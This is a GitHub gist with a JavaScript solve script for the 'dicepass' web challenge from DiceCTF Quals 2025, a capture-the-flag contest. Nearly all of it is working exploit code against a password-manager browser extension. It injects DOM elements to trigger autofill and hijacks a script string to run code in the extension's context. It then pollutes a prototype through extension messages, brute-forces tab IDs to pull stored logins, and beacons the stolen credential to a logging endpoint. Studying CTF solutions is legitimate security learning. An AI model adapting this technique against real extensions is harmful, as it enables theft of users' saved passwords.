Created
March 30, 2025 21:09
-
-
Save strellic/e7d84f25ef9793276e333dbcb45ae37d to your computer and use it in GitHub Desktop.
web/dicepass solve script from DiceCTF Quals 2025
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| document.head.innerHTML += ` | |
| <form data-dicepass-username='x'> | |
| <input name=value></input> | |
| <input data-dicepass-password='x'> | |
| </form> | |
| `; | |
| await new Promise(r => setTimeout(r, 1000)); | |
| const extensionId = await window.dicepass.extensionId; | |
| console.log('extensionId', extensionId); | |
| await window.dicepass.autofill(); | |
| dicepass.prevUsername.ownerDocument.defaultView.scanPage = ` | |
| (async () => { | |
| chrome.runtime.onMessage.addListener((msg) => { | |
| if (msg.type === "RAW" && typeof msg.value === "object") { | |
| window.postMessage(msg, "*"); | |
| } | |
| }); | |
| const tabId = await chrome.runtime.sendMessage("init-content"); | |
| console.log("tabId", tabId); | |
| console.log("polluting..."); | |
| chrome.runtime.sendMessage({ | |
| id: "xyz", | |
| type: "SET", | |
| path: ["__proto__", "tabId"], | |
| value: { | |
| type: "RAW", | |
| value: tabId | |
| } | |
| }); | |
| await new Promise(r => setTimeout(r, 1000)); | |
| chrome.runtime.sendMessage({ | |
| id: "xyz", | |
| type: "APPLY", | |
| path: ["vault"] | |
| }); | |
| await new Promise(r => setTimeout(r, 2000)); | |
| for (let i = 1; i <= 1024; i++) { | |
| const newTabId = tabId + i; | |
| console.log(newTabId); | |
| chrome.runtime.sendMessage({ | |
| id: "xyz", | |
| type: "APPLY", | |
| path: ["getLogin"], | |
| argumentList: [{ | |
| type: "RAW", | |
| value: newTabId | |
| }] | |
| }); | |
| } | |
| })(); | |
| `; | |
| await new Promise(r => setTimeout(r, 500)); | |
| document.body.innerHTML += "<h1>yo</h1>"; | |
| await new Promise(r => setTimeout(r, 750)); | |
| let w = window.open("chrome-extension://" + extensionId + "/popup.html"); | |
| window.onmessage = async (e) => { | |
| if (e.data.type !== "RAW" || typeof e.data.value !== "object" || !Array.isArray(e.data.value)) { | |
| return; | |
| } | |
| if (e.data.value.length === 0) { | |
| return; | |
| } | |
| if (!e.data.value[0].origin || !e.data.value[0].username) { | |
| return; | |
| } | |
| window.onmessage = (e) => { | |
| if (e.data.type !== "RAW" || !e.data.value || typeof e.data.value !== "object") { | |
| return; | |
| } | |
| if (e.data.value.username === "flag") { | |
| navigator.sendBeacon("/log", JSON.stringify(e.data)); | |
| window.onmessage = null; | |
| } | |
| }; | |
| w.close(); | |
| const target = e.data.value.find(v => v.username === "flag").origin; | |
| navigator.sendBeacon("/log", target); | |
| w = window.open(target); | |
| await new Promise(r => setTimeout(r, 2000)); | |
| w.close(); | |
| } | |
| })(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment